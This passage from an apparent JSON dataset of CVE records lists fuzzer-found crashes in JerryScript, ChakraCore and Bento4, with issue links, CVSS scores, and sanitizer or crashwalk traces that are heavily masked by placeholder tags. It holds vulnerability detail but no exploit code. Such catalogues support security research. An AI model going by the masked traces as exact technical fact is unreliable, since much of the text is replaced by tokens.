NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in 
ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in 
ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in 
ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in 
ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG SUMMARY: APITAG stack overflow PATHTAG ecma_regexp_match NUMBERTAG ABORTING Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55506. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55507. "severity": "CRITICAL",
  55508. "baseScore": 9.8,
  55509. "impactScore": 5.9,
  55510. "exploitabilityScore": 3.9
  55511. },
  55512. {
  55513. "CVE_ID": "CVE-2020-23308",
  55514. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3819",
  55515. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3819",
  55516. "Repo_new": "jerryscript-project/jerryscript",
  55517. "Issue_Created_At": "2020-05-31T13:53:00Z",
  55518. "description": "ICE: Assertion 'context_p >stack_top_uint8 == LEXER_EXPRESSION_START' failed at PATHTAG APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55520. "severity": "HIGH",
  55521. "baseScore": 7.5,
  55522. "impactScore": 3.6,
  55523. "exploitabilityScore": 3.9
  55524. },
  55525. {
  55526. "CVE_ID": "CVE-2020-23309",
  55527. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3820",
  55528. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3820",
  55529. "Repo_new": "jerryscript-project/jerryscript",
  55530. "Issue_Created_At": "2020-05-31T14:20:41Z",
  55531. "description": "Assertion 'context_p >stack_depth == context_p >context_stack_depth' in parser_parse_statements. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55532. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55533. "severity": "HIGH",
  55534. "baseScore": 7.5,
  55535. "impactScore": 3.6,
  55536. "exploitabilityScore": 3.9
  55537. },
  55538. {
  55539. "CVE_ID": "CVE-2020-23310",
  55540. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3821",
  55541. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3821",
  55542. "Repo_new": "jerryscript-project/jerryscript",
  55543. "Issue_Created_At": "2020-06-01T03:00:22Z",
  55544. "description": "Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55545. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55546. "severity": "HIGH",
  55547. "baseScore": 7.5,
  55548. "impactScore": 3.6,
  55549. "exploitabilityScore": 3.9
  55550. },
  55551. {
  55552. "CVE_ID": "CVE-2020-23311",
  55553. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3822",
  55554. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3822",
  55555. "Repo_new": "jerryscript-project/jerryscript",
  55556. "Issue_Created_At": "2020-06-01T03:10:23Z",
  55557. "description": "Assertion 'context_p APITAG == LEXER_RIGHT_BRACE || context_p APITAG == LEXER_ASSIGN || context_p APITAG == LEXER_COMMA' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55559. "severity": "HIGH",
  55560. "baseScore": 7.5,
  55561. "impactScore": 3.6,
  55562. "exploitabilityScore": 3.9
  55563. },
  55564. {
  55565. "CVE_ID": "CVE-2020-23312",
  55566. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3824",
  55567. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3824",
  55568. "Repo_new": "jerryscript-project/jerryscript",
  55569. "Issue_Created_At": "2020-06-01T04:16:48Z",
  55570. "description": "Assertion APITAG & PARSER_SCANNING_SUCCESSFUL' in parser_parse_source. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55572. "severity": "HIGH",
  55573. "baseScore": 7.5,
  55574. "impactScore": 3.6,
  55575. "exploitabilityScore": 3.9
  55576. },
  55577. {
  55578. "CVE_ID": "CVE-2020-23313",
  55579. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3823",
  55580. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3823",
  55581. "Repo_new": "jerryscript-project/jerryscript",
  55582. "Issue_Created_At": "2020-06-01T03:58:55Z",
  55583. "description": "Assertion 'scope_stack_p > context_p >scope_stack_p' in scanner_literal_is_created. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55584. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55585. "severity": "HIGH",
  55586. "baseScore": 7.5,
  55587. "impactScore": 3.6,
  55588. "exploitabilityScore": 3.9
  55589. },
  55590. {
  55591. "CVE_ID": "CVE-2020-23314",
  55592. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3825",
  55593. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3825",
  55594. "Repo_new": "jerryscript-project/jerryscript",
  55595. "Issue_Created_At": "2020-06-01T04:41:43Z",
  55596. "description": "Assertion 'block_found' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55598. "severity": "HIGH",
  55599. "baseScore": 7.5,
  55600. "impactScore": 3.6,
  55601. "exploitabilityScore": 3.9
  55602. },
  55603. {
  55604. "CVE_ID": "CVE-2020-23315",
  55605. "Issue_Url_old": "https://github.com/microsoft/ChakraCore/issues/6453",
  55606. "Issue_Url_new": "https://github.com/chakra-core/chakracore/issues/6453",
  55607. "Repo_new": "chakra-core/chakracore",
  55608. "Issue_Created_At": "2020-06-01T09:03:35Z",
  55609. "description": "APITAG in APITAG ERRORTAG",
  55610. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55611. "severity": "HIGH",
  55612. "baseScore": 7.5,
  55613. "impactScore": 3.6,
  55614. "exploitabilityScore": 3.9
  55615. },
  55616. {
  55617. "CVE_ID": "CVE-2020-23319",
  55618. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3834",
  55619. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3834",
  55620. "Repo_new": "jerryscript-project/jerryscript",
  55621. "Issue_Created_At": "2020-06-03T03:42:30Z",
  55622. "description": "Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE (flags >> CBC_STACK_ADJUST_SHIFT)) APITAG stack_depth' in APITAG APITAG revision a NUMBERTAG e NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55623. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55624. "severity": "HIGH",
  55625. "baseScore": 7.5,
  55626. "impactScore": 3.6,
  55627. "exploitabilityScore": 3.9
  55628. },
  55629. {
  55630. "CVE_ID": "CVE-2020-23320",
  55631. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3835",
  55632. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3835",
  55633. "Repo_new": "jerryscript-project/jerryscript",
  55634. "Issue_Created_At": "2020-06-03T04:04:08Z",
  55635. "description": "Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' in APITAG APITAG revision a NUMBERTAG e NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55636. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55637. "severity": "HIGH",
  55638. "baseScore": 7.5,
  55639. "impactScore": 3.6,
  55640. "exploitabilityScore": 3.9
  55641. },
  55642. {
  55643. "CVE_ID": "CVE-2020-23321",
  55644. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3870",
  55645. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3870",
  55646. "Repo_new": "jerryscript-project/jerryscript",
  55647. "Issue_Created_At": "2020-06-06T14:03:56Z",
  55648. "description": "heap buffer overflow in lit_read_code_unit_from_utf8. APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG",
  55649. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55650. "severity": "CRITICAL",
  55651. "baseScore": 9.8,
  55652. "impactScore": 5.9,
  55653. "exploitabilityScore": 3.9
  55654. },
  55655. {
  55656. "CVE_ID": "CVE-2020-23322",
  55657. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3869",
  55658. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3869",
  55659. "Repo_new": "jerryscript-project/jerryscript",
  55660. "Issue_Created_At": "2020-06-06T13:55:33Z",
  55661. "description": "Assertion 'context_p APITAG == LEXER_RIGHT_BRACE || context_p APITAG == LEXER_ASSIGN || context_p APITAG == LEXER_COMMA' in APITAG APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55662. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55663. "severity": "HIGH",
  55664. "baseScore": 7.5,
  55665. "impactScore": 3.6,
  55666. "exploitabilityScore": 3.9
  55667. },
  55668. {
  55669. "CVE_ID": "CVE-2020-23323",
  55670. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3871",
  55671. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3871",
  55672. "Repo_new": "jerryscript-project/jerryscript",
  55673. "Issue_Created_At": "2020-06-07T10:51:46Z",
  55674. "description": "heap buffer overflow in re_parse_char_escape. APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55675. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55676. "severity": "CRITICAL",
  55677. "baseScore": 9.8,
  55678. "impactScore": 5.9,
  55679. "exploitabilityScore": 3.9
  55680. },
  55681. {
  55682. "CVE_ID": "CVE-2020-23330",
  55683. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/511",
  55684. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/511",
  55685. "Repo_new": "axiomatic-systems/bento4",
  55686. "Issue_Created_At": "2020-05-16T12:08:52Z",
  55687. "description": "SEGV by a READ memory access (address points to the zero page). Command: ./mp NUMBERTAG aac APITAG /tmp/out.aac APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f bp NUMBERTAG ffc6b NUMBERTAG a3d0 sp NUMBERTAG ffc6b NUMBERTAG a NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG e in APITAG int, unsigned int&) ( PATHTAG NUMBERTAG d7f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG a NUMBERTAG e in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG a NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG f1e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG int, unsigned int NUMBERTAG ABORTING Information provided by crashwalk: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: PROBABLY_NOT_EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG int, unsigned int NUMBERTAG f9b NUMBERTAG in PATHTAG Disassembly NUMBERTAG f9b NUMBERTAG jb NUMBERTAG f9b NUMBERTAG APITAG NUMBERTAG f9b NUMBERTAG test esi,esi NUMBERTAG f9b6b: je NUMBERTAG f9b NUMBERTAG APITAG NUMBERTAG f9b6d: mov rax,QWORD PTR [rdi NUMBERTAG f9b NUMBERTAG lea ecx,[rsi NUMBERTAG f9b NUMBERTAG mov ecx,DWORD PTR [rax+rc NUMBERTAG f9b NUMBERTAG or eax,ea NUMBERTAG f9b NUMBERTAG mov DWORD PTR [rdx],ec NUMBERTAG f9b7b: ret NUMBERTAG f9b7c: nop DWORD PTR [ra NUMBERTAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG f9b NUMBERTAG in PATHTAG APITAG NUMBERTAG ce NUMBERTAG in PATHTAG APITAG NUMBERTAG bd NUMBERTAG in PATHTAG main NUMBERTAG ab NUMBERTAG c: in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG c0 rc NUMBERTAG rd NUMBERTAG fffffffdb NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG a0 rbp NUMBERTAG rsp NUMBERTAG fffffffdae8 r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG a r NUMBERTAG r NUMBERTAG fffffffdb NUMBERTAG r NUMBERTAG fffffffdbf0 r 
NUMBERTAG rip NUMBERTAG f9b NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation near NULL on source operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. END SUMMARY",
  55688. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55689. "severity": "HIGH",
  55690. "baseScore": 7.5,
  55691. "impactScore": 3.6,
  55692. "exploitabilityScore": 3.9
  55693. },
  55694. {
  55695. "CVE_ID": "CVE-2020-23331",
  55696. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/509",
  55697. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/509",
  55698. "Repo_new": "axiomatic-systems/bento4",
  55699. "Issue_Created_At": "2020-05-16T11:29:41Z",
  55700. "description": "SEGV by a READ memory access in APITAG Command line: ./mp NUMBERTAG aac APITAG /tmp/out.aac Information provided by crashwalk: CRASH SUMMARY Filename: psym APITAG SHA1: APITAG Classification: PROBABLY_NOT_EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG NUMBERTAG de NUMBERTAG in PATHTAG Disassembly NUMBERTAG de NUMBERTAG test rbx,rb NUMBERTAG de NUMBERTAG je NUMBERTAG de NUMBERTAG APITAG NUMBERTAG de NUMBERTAG nop WORD PTR [rax+ra NUMBERTAG de NUMBERTAG mov rdi,QWORD PTR [rb NUMBERTAG de NUMBERTAG mov rsi,rbp NUMBERTAG de NUMBERTAG mov rax,QWORD PTR [rdi NUMBERTAG de NUMBERTAG call QWORD PTR [ra NUMBERTAG de NUMBERTAG c: mov rbx,QWORD PTR [rb NUMBERTAG de NUMBERTAG test rbx,rb NUMBERTAG de NUMBERTAG jne NUMBERTAG de NUMBERTAG APITAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG de NUMBERTAG in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG de NUMBERTAG c: in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG e NUMBERTAG fc: in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG c NUMBERTAG e7: in PATHTAG APITAG NUMBERTAG b4eef: in PATHTAG APITAG NUMBERTAG b7b5f: in PATHTAG APITAG NUMBERTAG bbf0d: in PATHTAG main NUMBERTAG ab4d2: in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG e4e0 rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG f5a0 rdi NUMBERTAG rbp NUMBERTAG f5a0 rsp NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG f5d0 r NUMBERTAG c r NUMBERTAG r NUMBERTAG ffff7d NUMBERTAG be0 r NUMBERTAG r NUMBERTAG f5a0 r NUMBERTAG f NUMBERTAG r NUMBERTAG d NUMBERTAG rip NUMBERTAG de NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation near NULL on source operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. 
This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. END SUMMARY Information provided by address sanitizer: APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG b NUMBERTAG bp NUMBERTAG ffee NUMBERTAG cd NUMBERTAG sp NUMBERTAG ffee NUMBERTAG cd7d0 T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG b NUMBERTAG in APITAG ) const ( PATHTAG NUMBERTAG e6e in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG e6e in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ( PATHTAG NUMBERTAG dd NUMBERTAG in APITAG int, unsigned short, unsigned short, unsigned short, char const , APITAG ) ( PATHTAG NUMBERTAG a in APITAG ( PATHTAG NUMBERTAG a NUMBERTAG e in APITAG int) ( PATHTAG NUMBERTAG b2 in main ( PATHTAG NUMBERTAG f NUMBERTAG df1e2 in __libc_start_main ( PATHTAG NUMBERTAG c 